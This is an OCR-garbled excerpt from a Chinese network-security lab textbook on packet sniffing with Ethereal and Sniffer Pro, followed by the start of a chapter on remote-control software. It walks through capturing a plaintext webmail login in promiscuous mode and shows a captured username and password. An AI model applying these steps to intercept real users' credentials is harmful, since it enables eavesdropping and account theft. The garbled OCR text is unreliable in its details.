. -| Time | Source | Destination | Protocol | Info 

















1 可 Reset Apply] Ready to load or capture = 


图 3341 运行 Bhereal 


1) 抓 包 实例 
选择 Capture—>Start 命令 ,出 现 抓 包 选 项 对 话 框 ,如 图 3.3.42 所 示 。 


@ Ethereal: Capture Options Wa [el xl 


Tze 一- | 










Interface: fo- Link DFE-530TX PCI Fast Ethernet 4 
J Limit each packet to js 4 7 bytes 


F Capture packets in promiscuous mode 


Filter| | 


Capture file(s) — — — — — — 和 | 





is] 


Use ring buffer Number of files fp e 


| Rotate capture file every fi 7 y second(s) 
[Display options | 








| Update list of packets in real time 


Automatic scrolling in live capture 





i Stop capture after fi 4 7 kilobyte(s) capture: 


| Stop capture after fi 3 second(s) 
[Name resolution | 


Capture limits — — — — — — — — — — — — 3 
I Stop capture after fi 7 -Y packet(s) = 








F Enable MAC name resolution 
I Enable network name resolution 





T: Enable transport name resolution 


| x] Cancel | 
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Interface: 选择 接口 ( 指 哪 块 网 卡 )。 
Limit each packet to: 是 否 限 制 包 大 小 。 
* 100 。 


Capture packets in promiscuous mode; 是 否 让 网 卡 工作 在 混杂 模式 上 。 

Filter; 包 过 滤 ( 过 滤 哪 些 包 ) 。 

以 上 是 基本 抓 包 设置 。 如 果 需 要 其 他 功能 ,可 以 设置 下 面 的 选项 : 

Capture file(s): 捕获 文件 。 

Display options: 扩展 选项 。 

Capture limits; 捕获 限定 。 

Name resolution; 名 称 辨别 。 

2) 数据 包 分 析 

完成 以 上 设置 后 , 单 击 OK 按钮 开始 抓 包 , 此 时 车 有 人 使 用 ping 命令 则 数据 包 会 被 
捕获 。 

图 3. 3. 43 中 黑色 部 分 是 被 截获 的 ping 包 (4 去 4 回 )。 





























图 3343 抓 取 ping 包 


分 析 ping 包 , 选 中 其 中 一 个 ping 包 , 此 时 会 在 第 二 个 列表 显示 该 包 的 相关 信息 ,如 
图 3.3.44 所 示 。 

从 中 可 以 了 解 以 下 消息 : 

CD 结构 : 其 中 包括 数据 包 收 到 时 间 、 数 据 包 传输 时 间 和 帧 数 等 。 

(2) 网 络 类 型 : 本 例 中 为 以 太 开 型 ,其 中 包括 来 源 . 目 的 和 类 型 (IP) 等 。 

Internet 协议 : 其 中 有 协议 类 型 (ICMP) .来源 地 址 和 目标 地 址 等 。 

Internet 控制 消息 请 求 协议 : ping 的 IP 地 址 ( 哪 一 方 请 求 , 哪 一 方 回应 )。 

具体 数据 内 容 在 最 下 面 的 方 框 中 显示 (为 二 进 制 码 ) 。 

3) 账户 和 密码 的 截获 

选择 菜单 Ethereal>Capture>Start 命令 .在 如 图 3. 3. 42 所 示 的 抓 包 选项 对 话 框 中 选 


择 混杂 模式 , 单 击 OK 按钮 开始 捕获 数据 包 , 单 击 Stop 按钮 停止 拦截 ,捕获 的 数据 包 信息 如 
* 101 + 





Ethereal 





" 
File Edit Capture Display Tools 





123.87.147.55 
123.87.147.55 
123.87.147.55 
123.87.147.55 
123.87.147.55 
123.87.147.55 
123.87.147.55 
123.87.147.55 
123.87.147.55 
28 1.006428 123.87.147.55 
29 1.006526 123.87.147.55 
30 1.021470 123.87.147.55 
31 1.021582 123.87.147.55 


ElFrame 1 (1510 bytes on wire, 1510 bytes captured) 
Bethernet II, Src: 02:01:00:00:00:00, Ost: ff:ff:ff:ff:ff:ff 
Data (1496 bytes) 


/| Reset} Apply|| File: «capture» Drops: 0 
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图 3.3.45 所 示 。 如 果 在 Ethereal 打开 时 ,有 人 正 登 录 某 信箱 ( 见 图 3. 3. 46) ,或 传输 明文 代 


码 ,该 包 将 会 被 拦截 。 
zii 





Eile Edit View Go Capture Analyze Statistics Help 
Gao a Sx eS Besos (ER 
COn J pres sion..| crear| api | 

E 


0.598205 112.101.76.152 























0.647555 192.168.1.90 112.101.76.152 
0.647556 192.168.1.90 112.101.76.152 
0.708245 112.101.76.152 192.168.1.90 
0.708500 192.168.1.90 112.101.76.152 
0.708577 112.101.76.152 
0.708578 . 112.101.76.152 
0.921991 192.168.1.90 
0.922141 112.101.76.152 
0.922143 112.101.76.152 
0.922215 112.101.76.152 
1.094898 192.168.1.90 
1.095232 。 112.101.76.152 
69 1.095234 112.101.76.152 
70 1.095307 112.101.76.152 
74 1.150717 52 192.168.1.90 
75 1.150935 90 112.101.76.152 
76 1.150936 112.101.76.152 
77 1.216987 192.168.1.90 
78 1.217254 192.168.1.90 112.101.76.152 
79 1.217286 192.168.1.90 112.101.76.152 
80 1.217331 192.168.1.90 112.101.76.152 
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3346 登录 邮箱 


选中 一 个 数据 包 (CTCP 协议 ) , 右 击 ,在 快捷 菜单 中 选择 Follow TCP Stream 命令 ,如 
图 3. 3. 47 所 示 。 


File Edit View Go Capture Analyze Statistics Help 
FAAA SHQUA RexoFL 
Eiter fup. addr eq 192.168.1.101 and ip.addr eq 202.118.177.80) and (tcp1 v Expression. | Clear 
































186 2.046663 202.118.177. 80 
















190 2.650902 202.118.177. 80 
192 2.660462 202.118.177. 80 
193 2.660466 202.118.177. 80 










= Frame 180 (819 bytes on wire, 819 bytes a 
日 Ethernet II, Src: Giga-Byt b7:69:86 (00:0f:ea:b7:69:86), Dst: Hewlet 
B Destination: HewlettP 54:cb:b7 (00:11:0a:54:cb:b7) 
Source: Gina-Rvt_h7-6O-86_(AN-NF-a2-h7-6O-R6) imf 






030 40 29 40 ec 00 00 50 4f 53 54 20 2f 77 65 62 2f 


4 | > 
File: “C:\Users\ADMINI~1\AppDatalLocaliTemplet.. |P: 402 D: 11 M: 0 Drops: 0 
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显示 TCP 包 的 信息 ,如 图 3. 3. 48 所 示 。 
E 
URL 下 方 为 网 站 反馈 信息 ) 。 例 如 : 


* 103 + 


Follow TCP stream 






Iser-Agent : Mozilla/5.0 (compatible; MSIE 9.0; windows NT 6.1; Trident/5.0;| 

QQBrowser /7. 6. 22690. 400. 

Referer; p: pa beu, edu. cn/indexNone/index_none. jsp?error=1 
N 


Ccept-L. 
orent ent-Type Loappiicarion/x-wmi-forn-ur encoded 
cept penencoding? r gzip, elem 








cookie: SESSEONTDLBICACELE3172C9972614067C27F693F6. tomcat2; GUEST LANGUAGH 
COOKIE SUPPORT-true 


p.p id-58&p p life ) state-normal. cu Lt oed 
Ez rogis ERES Tonina 31 30a sh passwor d=12 3430 Dos 


AES 
Ite: Sat, UN May 2014 06:41:33 GMT 
.2.16 CC mod jk/1: 2.28 
hrbeu. edu. cn/indexNone/index none. jsp?error=1 


connection: Keep-Ali 
'ontent -Type: t/ha charset=UTF-8 


GET /indexNone/index_none. jsp?error=1 HTTP/1.1 
cept: text/html, application/xhtml+xml, */* 


iser- I— Mozilla/5.0 (compatible; MSIE 9.0; windows NT 6.1; Trident/5.0; 
owser /7. 6. um 400: 
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usemame= baozong&password- 22222222 

注意 : Ethereal 不 能 开启 太 长 时 间 , 如 果 拦 截 的 数据 包 过 多 ,超过 Ethereal 的 承受 能 
A Ethereal 44 Jj wt 。 

提示 : 在 网 络 上 传输 数据 时 一 定 要 注意 保密 性 ! 

2. 用 Sniffer Pro 抓 取 数据 包 并 实例 分 析 

CD 将 Sniffer Pro 安装 在 本 机 Windows 2000/XP(192. 168. 0. 245) 上 ,如 图 3. 3. 49 所 示 。 








3349 安装 界面 


(2) 安装 完成 ,如 图 3. 3. 50 所 示 。 

(3) 启动 Sniffer Pro 软件 。 

启动 Sniffer Pro 软件 后 可 以 看 到 它 的 主 界面 ,如 图 3. 3. 51 rz ,启动 的 时 候 有 时 需要 
选择 相应 的 网 卡 (adapter) ,然后 即 可 启动 软件 。 


* 104 + 


Setup Complete 





Setup has finished copying files to your computer. 


Before you can use the program, you must restart Windows or 
your computer. 


@ Mes | want lo restart mp computer now! 
C No, | will restart my computer later, 





Remove any disks from their drives, and then click Finish to 
complete setup. 
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Sniffer - Local, Ethernet (Line speed at 100 Mbps) 
菜单 File Monitor Capture Display Tools Database Window Help 


| Lul alijas] 8| rent z 
LIU ala alal Saleela] A) S| el 





主 窗口 





图 3351 Nfe Po 主 界面 
主 界面 的 工具 栏 如 图 3. 3. 52 所 示 。 
捕获 报 文 按钮 





网 络 性 能 监视 按钮 
图 3352 工具 栏 


Dashboard 可 以 监控 网 络 的 利用 率 、 流 量 及 错误 报 文 等 内 容 , 如 图 3. 3. 53 所 示 。 
从 Host Table 中 可 以 直观 地 看 出 连接 的 主机 ,如 图 3.3.54 所 示 , 显 示 方 式 为 IP 地址 。 
(4) 定义 过 滤器 来 捕捉 192. 168. 0. 40 上 的 IP 数据 包 , 如 图 3. 3. 55 和 图 3. 3. 56 所 示 ， 
完成 设置 后 单 击 OK 按钮 。 
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(b) 界面 2 


图 3358 ”Dashboard 界 面 


E Host Table: 13 stations 


In Pkts [Out Pkts [In Bytes | Dut Bytes Multi 





E 202112 254 2 
2 


i202 112294 132 
] 





E 接 的 主机 的 IP 


E 202.104.129.253 











< 
MAC AP fox 7 
图 3354 Host Table 界面 


(5) 从 Sniffer 软件 中 选择 菜单 Monitor 3 £& — Matrix 命令 ,图 3.3.57 显示 了 192. 
168. 0. 40 的 通信 情况 , 右 击 该 地 址 .在 快捷 菜单 中 选择 Capture 命令 开始 捕捉 。 
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[Penne Fiter 2x 
Summary Address |Dats Pattern | Advanced | Buffer | 
Address Known Address: (Dragable) 
IP - 
Mode 
C Include 





C Exclude 





Station 1 Station 2 


192.168.040 








ttftt 


1i Us Us Us Hi 
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取消 Profiles 
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(6) 在 停止 捕捉 后 ,选择 Decode 选项 ,查看 捕捉 到 的 IP 包 , 如 图 3. 3. 58 所 示 。 


$i 43 
12905874 VIN=17424 
AME» 1047972020242— 

ACK=1603037189 VIN«6432 

STAT=Foraat error 


Version = 4. header length = 20 bytes 
Type of service = 00 
000 * routine 
0 normal delay 
noraal throughput 
normal reliability 
ECT bit - transport protocol will ignore the CE bit 
CE bit - no congestion 
Total length 
Identification 
Flags 
1 don't fragment 
0 last fragment 
Fragment offset = 0 bytes 
Tine to live 128 seconds/hops 





图 3358 解码 数据 包 


(7) 从 图 3. 3. 59 可 以 看 出 有 3 个 窗口 ,最 上 面 的 窗口 是 捕获 的 数据 ,中 间 的 窗口 是 数 
据 分 析 , 最 下 面 的 窗口 是 原始 数据 包 , 用 十 六 进 制 表示 。 例 如 ,TCP Source port —1282 对 应 
下 面 的 05 02。 


0 "Name error 
OP-QUERY NAME*a gtld-servers 
QUERY STAT*OK NAME*a gt. 
C ID«81 OP*REGISTER NAME=com 
D«1278 S53 FIN ACK=1611369269 SEQ' 
D-53 S=1278 ACK=434379061 VIN*17. 
R ID«81 OP*REGISTER STAT-Refused 


379: 
DeS3 5.1282 ÀCK*437322457 VIN*17424 
C ID«23680 OP-QUERY NÀME-1047972020242— 

> R ID*23680 OP-OUERY STAT-Format error 


L) IP. Destination address = [192.5.6 30]. a.gtid-servers net 


Destination port * $3 (Domain) 
Initial sequence nuxber » 1611929767 
Next expected Seq numbers 1611929768 
Data offset 28 bytes 
Flags 02 
(No urgent pointer) 
(No acknowledgnent ) 
(No push) 
(No reset) 





E 
(No FIN) 





20: 06 le 00 35 60 14 18 a7 00 00 00 00 70 02 MÁS ^ p 
00000030: 40 00 3e 39 00 00 02 04 OS b4 01 01 04 02 25 2 


A339 数据 分 析 窗 口 





(8) 从 窗口 中 可 以 看 出 ,IP 数据 包 封装 在 TCP 数据 包 的 前 面 ,如 图 3. 3. 60 所 示 。 
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DLC 首部 IP TCP DLC 尾部 





VIR2I D $753 SYN A 
ja gtld-eervers.|1cP. D-53 .3382 
AAt ld-acremrs |DWS. C IDw23&An nPeOEEY 





P 
IP: Version ^ 4. Koniar length < 20 byte 
IP. Type of service + 

IP 000 redes 


IP [] = normal delay 
IP 0... * normal throughput 
IP 0.. = normal reliability 
IP 0. = ECT bit ~ transport protocol will ignore the CE bit 
IP 0 = CE bit — no congestion 
IP Total length = 48 bytes 
IP. Identification = 1318 
IP. Flags -ax 
IP 1 + don't fragment 
IP o * lest fregnent 
HOI Fregnent pliant * 0 tries 
IP. Time to li = 128 seconds/hops 
IP. Protocol = 6 (TCP) 
IP Header checksum = 6EAE (correct 
IP. Source address 7 [132-169 0.40). VIR207 


n 
IP. Destination address = [192.5 6 30]. e gtld-servers.net 


IP 
99 Tc. ——— TCP header 


mcr 到 











E 00 00 70 02 
00000030: 40 00 3e 33 00 00 02 04 OS ba 01 01 04 02 Lu] ? 


图 3360 数据 分 析 窗 口 


(9) IP 数据 包头 的 结构 如 图 3. 3. 61 所 示 。 查 看 IP 头 , 如 图 3. 3. 62 所 示 。 











32 位 目的 地 址 P 





选项 (如 果 有 ) 








图 3361 IP 数 据 包 头 结构 


(10) 查看 TCP 包 , 如 图 3. 3. 63 所 示 。TCP 包头 的 结构 如 图 3. 3. 64 所 示 。 

QD 定义 过 滤器 来 捕 提 192. 168. 0. 40 的 ICMP 数据 包 , 如 图 3. 3.65 所 示 。 

(12) 从 本 机 (192. 168. 0. 245)Ping 目标 主机 (192. 168. 0. 40) ,如 图 3. 3. 66 所 示 。 

(13) 停止 捕 提 后 从 Decode 窗口 中 找 出 ECHO 及 ECHO REPLY 数据 包 , 如 图 3. 3. 67 
所 示 。 

(14) 分 析 ICMP 数据 包头 信息 ,如 图 3. 3. 68 所 示 。 

ICMP 类 型 : 8。 

代码 : 0。 

校 验 和 : 395C( 正 确 ) 。 

确认 号 : 1024。 

序号 : 4096, 
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D-1282 Se53 SYN ACK-1611923768 SBQ=43: 
4CK«437322457 VIN 17424 | 60 


D«53 5«1282 FIN ACK«427322471 SEQ«16119. 
35-1283 SYN SEO-1612245154 LEN=0 UI 
282 9-53 — ACK+1611929908 VIN-6432 
35-1282 —— ACK-437322471 VIN-17410 
282 S=S3 FIN ACK+1611923908 SEQ«4379. 

D«53 $«1282 —— ACK-«437322472 VINs17410 

-53 SYN ACK~1612245155 SEQ«4354 


Version + 4. header length + 20 bytes 
Type of service * 00 
000 ~ routine 
normal delay 
normal throughput 
normal reliability 
ECT bit - transport protocol will ignore the CE bit 
CE bit - to congestion 
Total length 
Identification 
Flags 
1 
[] 
Frognent offset 
Tine to live 
Protecol 
Header checksum 


IP. Destination address = [192 $ 6 20]. a gtid-servers net 


1282 S*53 SYN ACK*1611929768 SEOw4379 
D«53 5«1282 ^ — ACK#437922457 VIN«17424 
àXE-1047572020242-. 


.OP-QUERY 
De53 S*1282 FIN ACK+437922471 SEDs16119 
DeS3 51283 SYN SEQ-1612245154 LENO UI 
Dei202 S=53  ACK+1611929908 VIN-6432 
De53 S1262  ACK=437922471 WINe17410 
282 S*53 FIN ACK+1611929909 SEQ+4373) 

2 ACK=437922472 VIN*17410 

3 SYN ACK-1612245155 SEQ«4256 








T 

TCP. Source port * 1202 

TCP: Destination port * $3 (Donsin) 
TCP: Initial sequence number = 1611929767 
TCP. Next expected Seq number* 1611929768 
TCP Data offset * 28 bytes 

TCP: Flags = 02 

TCR o * (No urgent pointer) 
TCR [] * (No acknowledgment) 
TR 0... = (No push) 
TCR. 0.. = (No reset) 
TR 1. = SIN 

Tee 0 = (No FIN) 

TCP: Vindow = 16384 

TCP. Checksum = 3839 (correct) 
Ter. 

TCP. Options follow 

TCP: Maximus segnent size = 1460 

TCP: No-op 

TCP: No-op 

TCP SACK-Permitted Option 

TR 





A 3363 TCP 包 解码 





[sts oe [Brao 3 | 
| 32 位 询问 序号 : 1611929767 | 
| 32 位 确认 序号 : 1611929768 | 











Lr | 保 z] ure| ack | psu | pst] sw| FIN | 16 位 窗口 大 小 : 65535. 
TTE: 16 位 紧急 指针 
E 











图 3364 TCP 包 头 结构 
110 + 


AE 


Summary | Address | Data Pattern Advanced | Settings For: 


CY rm 
OF rm sma 
[^^ reeeeo2. 11 
VY ir 

















取消 “| Profiles. | 


A336 定义 过 滤器 





BAG (Version 5.80.21 
1985-2000 Microsoft Corp. 





PING 192.168.0. 


Approx inate 
Min inum 














图 3366 Fng 目 标 主机 














hernet (Line speed ot 10 Mbps) - [Sml2: Decode, 3/58 Ethernet Frames] 5 
Ele Mentor Capture Qipay Took Database Window Help Bat IE: 


ETECO [omen =] 
Sia) ala) aalas azl 2| e| «| 
















[Dew Access [Sunmany TL B] Rel Tee [Data Tine 
[192.168.0.245]/ [192.168 0.40] 74 0.00.00 000, 0.000 
332,160,040] 11132 168 0.245) 1 74 | 0:00:00 000) 0 000 
1[192.168.0.24$]/ [192.168 0 40] | ICMP: Echo 174 | 0:00:01.000! 1.000 
[192.168.0 40) |[192.168.0. 245]. 74 0.00.01.001| 0.000 
[192 168.0 245]|[192.168.0.40] 1 74 | 0:00:02 000| 0.999 
[192:168:0 40] | [192 168 0 245) IC 74 | 0:00:02 001| 0.000 
[132.168 .0.245]| [192-168 0 40] | IO 74 | 0:00:03 .000| 0.999 
[192 :168:0 40] |[192:168:0.245] 74 | 0:00:03.001| 0.000 
[192.168.0245] [192.1680 40] M 74 0:00:04.000| 0.999 
{192 168.0 40] |[132 168 0-245) 101 74 | 9:00:04-001| 0.000 











"Station Ivill DOCAIE 
0800 (IP) 





n aT 


Ci 





00 0c 23 62 a6 37-00 d0 66 00 c4 ie 06 00 MERÜS b — 1.7. ET 
00 3c 02 Sb 00 00 B0 01 bS f8 cO a8 00 fS cO a8 «.[. p MEE JPN 
00000020: 00/28 9 B sE 

00000030 2 2 


alie 








3367 解码 IOPE 


DLC 头 部 IP 头 部 ICMP 头 部 





ET 


P. Total length 
P: Id 


jentification * 


* BSF8 (correct 

urce address = (192.168.0. 245] 
Destination address = [192 168.0 40] 
s 








图 3368 ICOVP 包 的 具体 结构 


数据 长 度 : 32B。 

提示 : 

(1) Sniffer 是 一 个 强大 的 抓 包工 具 ,数据 包 分 析 功 能 强大 ,如 果 正 确 使 用 ,对 于 分 析 、 定 
位 网 络 故 障 十 分 有 用 。 

(2) 由 于 Sniffer 工具 功能 强大 ,甚至 可 以 充当 黑客 工具 ,因为 很 多 协议 是 明文 传输 ,如 
FTP、Telnet 等 ,通过 Sniffer 工具 可 以 查看 用 户 名 和 密码 。 

G) 从 OSI 结构 上 看 ,IP 包 属于 第 三 层 (网 络 层 ) ,TCP 包 属 于 第 四 层 (传输 层 ) ,在 数据 
包 中 IP KZE TCP 头 的 前 面 。 

(4) 从 实验 中 可 以 清晰 地 看 出 TCP 的 3 次 握手 过 程 。 

(5) 由 实验 可 以 看 出 ,Sniffer Pro 可 以 探查 出 局 域 网 内 流动 的 任何 信息 ,其 中 包括 用 户 
名 和 密码 之 类 敏感 的 数据 ,所 以 数据 在 局 域 网 内 的 安全 就 至 关 重要 了 。 其 实 , 只 要 在 计算 机 
内 安装 网 络 防火 墙 ,并 把 Windows 操作 系统 的 安全 级 别提 高 ,Sniffer Pro 工具 就 可 能 嗅 探 
不 到 任何 信息 。 


实验 报告 要 求 


。 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阑 述 遇 到 的 问题 以 及 解决 方法 。 
: 阐述 收获 与 体会 。 
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Wade ”远程 控制 实验 


4.1 远程 控制 原理 


所 谓 远程 控制 ,是 指 管理 人 员 在 异地 通过 计算 机 网 络 联通 被 控制 的 计算 机 ,将 被 控 计 算 
机 的 桌面 环境 显示 到 自己 的 计算 机 上 ,通过 本 地 计算 机 对 远 端 计算 机 进行 配置 .软件 安装 和 
文件 编辑 等 工作 。 当 操作 者 使 用 主 控 计 算 机 控制 被 控 端 计算 机 时 ,可 以 启动 被 控 端 计 算 机 
的 应 用 程序 ,使 用 被 控 端 的 文件 资料 ,甚至 可 以 利用 被 控 端 计算 机 的 外 部 设备 和 通信 设备 来 
进行 工作 。 

远程 控制 必须 通过 网 络 才能 进行 。 位 于 本 地 的 计算 机 是 操纵 指令 的 发 出 端 , 称 为 主 控 
端 或 客户 端 , 非 本 地 的 被 控制 的 计算 机 称 为 被 控 端 或 服务 器 端 。 


4.1.1 远程 控制 技术 


随 着 网 络 的 快速 发 展 以 及 计算 机 管理 和 技术 支持 的 需要 ,远程 操作 及 控制 技术 越 来 越 
引起 人 们 的 关注 。 远 程控 制 支持 多 种 网 络 方式 : LAN、WAN ,拨号 方式 及 互联 网 方式 。 此 
外 ,远程 控制 还 支持 通过 串口 .并口 和 红外 端口 来 对 目标 主机 进行 控制 。 传 统 的 远程 控制 技 
术 一 般 使 用 NETBEUINETBIOS IPX/SPX 和 TCP/IP 等 协议 来 实现 ,此 外 ,还 支持 Java 
技术 ,以 实现 不 同 操作 系统 下 的 远程 控制 。 远 程控 制 的 工作 原理 如 图 4. 1. 1 所 示 。 


被 控 端 








图 411 远程 控制 的 工作 原理 





远程 控制 由 两 部 分 组 成 : 客户 端 (Client) 程 序 和 服务 器 端 (Server) 程 序 。 在 进行 远程 
控制 前 ,需要 事先 将 客户 端 程序 安装 到 主 控 端 计算 机 上 ,服务 器 端 程序 安装 到 被 控 端 计算 机 
上 。 对 于 Windows XP 或 Windows Server 2003 操作 系统 而 言 , 可 以 利用 随机 自 带 的 系统 
程序 实现 远程 控制 。 

远程 控制 的 过 程 是 : 先 在 主 控 端 计算 机 上 执行 客户 端 程序 ,向 被 控 端 计算 机 中 的 服务 
器 端 程序 发 出 信号 ,建立 一 个 特殊 的 远程 服务 ;通过 这 个 远程 服务 ,使 用 远程 控制 功能 发 送 
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远程 控制 命令 ,控制 被 控 端 计算 机 运行 。 
4.1.2 远程 控制 方式 


远程 控制 的 实现 方式 通常 有 两 种 : 点 对 点 方式 和 点 对 多 点 方式 。 

如 图 4. 1. 2 所 示 ,Windows XP 或 Windows Server 2003 操作 系统 的 主机 通常 采用 点 对 
点 工作 方式 。 点 对 点 控制 指 的 是 一 个 远程 客户 端的 程序 在 同一 时 间 内 只 能 连接 并 控制 唯一 
一 台 远 程 计 算 机 。 点 对 点 控制 程序 以 客户 端 控制 服务 器 端的 模式 工作 ,这 也 是 远程 访问 控 
制 中 运用 得 最 普遍 的 情况 。 点 对 点 的 访问 控制 主要 应 用 于 对 远程 主机 进行 具体 控制 和 监控 
的 需求 。 





交换 机 交换 机 
-EE 


m s 


被 控 端 计算 机 E 控 端 计算 机 
图 412 远程 控制 的 点 对 点 方式 


一 些 专业 软件 ,如 远程 控制 软件 pcAnywhere, 可 以 借助 局 域 网 的 优势 用 一 台 计 算 机 控 
制 多 台 计 算 机 ,实现 对 远程 主机 的 多 点 控制 ,如 图 4.1.3 所 示 。 点 对 多 点 的 访问 控制 可 以 在 
同一 时 间 内 对 一 台 或 多 台 远 程 计算 机 进行 控制 。 点 对 多 点 的 访问 控制 流程 和 点 对 点 相反 ， 
首先 由 每 个 客户 端 程序 向 服务 器 端 程序 发 出 连接 请 求 ,建立 连接 之 后 ,服务 器 端 就 可 以 对 多 
台 远 程 计算 机 的 客户 端 程序 发 出 指令 并 由 客户 端 程序 执行 指令 。 点 对 多 点 的 访问 控制 主要 
应 用 于 控制 大 范围 计算 机 领域 ,如 定时 、 收 费 和 监督 等 。 


传送 数据 包 & 











被 控 端 计算 机 
Dye 
SS 传送 数据 包 
主 控 端 计算 机 被 控 端 计算 机 
传送 数据 包 
被 控 端 计算 机 


图 413 远程 控制 的 点 对 多 点 方式 


远程 控制 在 计算 机 网 络 管理 与 维护 中 应 用 相当 普遍 ,网 络 管理 员 可 以 通过 接 入 局 域 网 
中 的 任意 一 台 计 算 机 ,通过 远程 控制 方式 对 网 内 服务 器 等 设备 进行 管理 和 维护 ,实现 在 服务 
右上 进行 软件 安装 、 系 统 升级 、 数 据 备 份 以 及 日 志 查 看 等 功能 。 
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4.1.3 远程 控制 软件 


随 着 数字 信息 处 理 需 求 越 来 越 广泛 ,远程 控制 越 来 越 多 地 应 用 到 人 类 生活 和 工作 中 ,下 
面 介绍 3 款 国内 外 著名 的 远程 控制 软件 。 


4.1.3.1 软件 简介 


1. DlinkPC( 中 国 ) 

DlinkPC 是 一 款 目 前 国内 集 远程 控制 .远程 开关 机 、 监 控 和 VPN 为 一 体 的 远程 服务 平 
台 。 只 要 申请 用 户 名 ,在 被 控制 的 计算 机 里 运行 被 控 端 程序 ,登录 后 设置 好 远程 访问 的 密码 ， 
就 可 用 主 控 端 程序 ,通过 相同 的 用 户 名 和 远程 访问 密码 进行 远程 桌面 控制 .下 载 / 上 传 文件 。 

2. TeamViewer( 德 国 ) 

TeamViewer 可 以 在 任何 防火 墙 和 NAT 代理 后 台 进 行 远 程控 制 , 实 现 桌 面 共享 和 文件 
传输 。 为 了 连接 到 另 一 台 计算 机 ,需要 在 两 台 计算 机 上 同时 运行 TeamViewer。 软 件 第 一 
次 启动 时 在 两 台 计 算 机 上 自动 生成 伙伴 ID, 只 需要 输入 伙伴 ID,TeamViewer 就 会 立即 建 
立 起 连接 。 该 软件 是 至 今 唯一 一 款 能 穿 透 内 网 的 远程 控制 软件 ,可 以 穿 透 各 种 防火 墙 ,任何 
一 方 都 不 需要 拥有 固定 的 IP 地 址 ,双方 可 以 相互 控制 。 

3. pcAnywhere( 美 国 ) 

pcAnywhere 是 一 款 独特 的 集成 解决 方案 , 它 结 合 了 远程 控制 .远程 管理 ,高 级 文件 传 
输 功 能 和 强健 的 安全 性 ,可 以 提高 技术 支持 效率 并 减少 呼叫 次 数 。 使 用 pcAnywhere 可 实 
现 对 Linux 和 Windows 系统 的 远程 管理 ,从 而 避免 使 用 命令 行 工具 。 使 用 被 控 端 会 议 功 
能 ,可 以 建立 起 一 个 pcAnywhere 被 控 端 的 多 个 并 发 远程 连接 。 


4.1.3.2 性 能 比较 


1. 安全 性 对 比 
(D) DIinkPC; 登录 被 控 端 软件 后 ,需要 设置 一 系列 安全 选项 (如 远程 访问 权限 、 远 程 访 
问 功能 和 远程 访问 密码 等 ), 如 图 4.1.4 所 示 。 





























图 414 DinkPC 访 问 设置 
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(2) TeamViewer: 在 软件 选项 中 设置 固定 密码 , 既 增加 安全 性 ,又 确保 密码 不 会 变化 。 
根据 安全 级 别 设置 访问 权限 ,限制 控制 方 的 操作 权限 ,如 图 4.1.5 所 示 。 


© TeamViewer 选项 





| 常规 【远程 控制 | 演示 | 安全 。 |[ 自 定义 六 请 | 高 级 





RA 


的 管理 在 Teaniewer 里 安全 和 隐私 是 丰 党 重要 的 
TOREA RENAR FERED Teaniewer 连接 部 提供 了 100% 实 全 的 


Seem NS, 3E Bo 
ARRAS US ie fed. 

















口 禁 止 TeamViewer 关闭 全 设置 提供 了 


入 站 访问 控制 
看 和 显示 


悠 的 饮 伴 可 以 查看 您 的 点 面 但 未 控制 您 的 
点 击 "详情 " 以 查看 预定 的 设置 











图 415 TeamMewer 访问 设置 
(3) pcAnywhere: 允许 被 控 方 主动 设置 用 户 名 和 密码 ;在 主 控 端 可 以 设置 连接 时 的 加 
密级 别 ,为 主 控 端 设 定 密码 ,提高 远程 访问 过 程 的 安全 性 。 
2. 服务 器 响应 速度 对 比 
服务 器 响应 速度 如 表 4. 1. 1 所 示 。 


表 4.1.1 服务 器 响应 速度 








软件 名 称 服务 器 响应 时 间 软件 名 称 服务 器 响应 时 间 
TeamViewer 5~8s pcAnywhere 不 需要 服务 器 
DlinkPC 3 一 8s 











3. 操作 方式 对 比 
3 种 软件 的 主要 功能 对 比如 表 4. 1.2 所 示 。 





表 4.1.2 软件 主要 功能 




















主要 功能 Team Viewer DlinkPC pcAnywhere 
远程 开机 x v ~ 
远程 控制 桌面 v v V 
远程 复制 ,粘贴 文字 v v v 
允许 多 重 连接 v v 
Windows 账户 验证 x 
文件 管理 (文件 上 传 . 下 载 ) vV v v 
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主要 功能 Team Viewer DlinkPC pcAnywhere 
文件 搜索 功能 x x x 
文件 断 点 续 传 J v 
语音 视频 VJ vV 
桌面 .视频 .语音 录制 v vV x 
远程 旋转 视频 监控 VJ Ni x 
VPN of J 
自动 升级 x x x 
查看 登录 记录 v vV vV 
隐 性 功能 (隐藏 软件 ) x x 
强制 中 转 ( 穿 透 代 理 上 网 ) x x x 











(D DIinkPC: 软件 分 为 主 控 端 .被 控 端 以 及 临时 客户 端 3 个 部 分 。 必 须 在 网 站 上 注册 
好 账号 ,登录 主 控 端 和 被 控 端 程序 ,就 可 以 在 列表 中 看 到 被 控 端 上 线 , 并 进行 控制 。 如 果 没 
有 申请 账号 ,可 以 让 主 控 端 生成 临时 账号 ,在 临时 客户 端 登录 ,也 能 进行 控制 。 

(2) TeamViewer: 软件 把 两 端的 功能 进行 整合 ,软件 安装 后 的 主机 既 可 做 主 控 端 也 可 
以 做 被 控 端 用 。 只 要 得 到 对 方 的 ID 以 及 密码 ,就 可 以 进行 远程 协助 或 者 控制 。 

(3) pcAnywhere: 程序 必须 同时 安装 在 主 控 端 和 被 控 端 计算 机 中 。 在 主 控 端 计算 机 
中 ,可 通过 “联机 向 导 ” 命 令 , 利 用 随后 打开 的 向 导 对 话 框 去 创建 主 控 端 。 与 主 控 端的 创建 方 
式 不 同 , 在 创建 被 控 端 向 导 中 可 设 定 连 接 的 用 户 名 及 密码 。 

pcAnywhere 是 赛 门 铁 克 公司 的 著名 产品 ,该 软件 适用 于 所 有 版 本 的 Windows 操作 系 
统 。 该 软件 的 使 用 与 管理 方式 比较 灵活 ,用 户 可 以 按照 自己 的 需要 单独 安装 主 控 端 或 被 控 
端的 软件 ,根据 需要 在 被 控 端 上 创建 各 种 连接 下 的 远程 控制 方案 ,并 能 根据 不 同 的 用 户 分 配 
不 同等 级 的 权限 。 在 安全 性 能 方面 .pcAnywhere 提供 了 多 种 验证 方式 和 加 密 方式 ,用 户 可 
以 直接 使 用 网 络 系统 的 用 户 资 料 库 验证 远程 连接 ,也 可 以 创建 独立 的 远程 控制 账户 ,根据 需 
要 选择 加 密 数 据 方式 ,保证 传输 过 程 中 数据 不 被 窃取 。 


4.2 远程 控制 基础 实验 
4.2.1 软件 的 安装 与 使 用 
实验 器 材 


pcAnywhere 软件 系统 ,1 套 。 
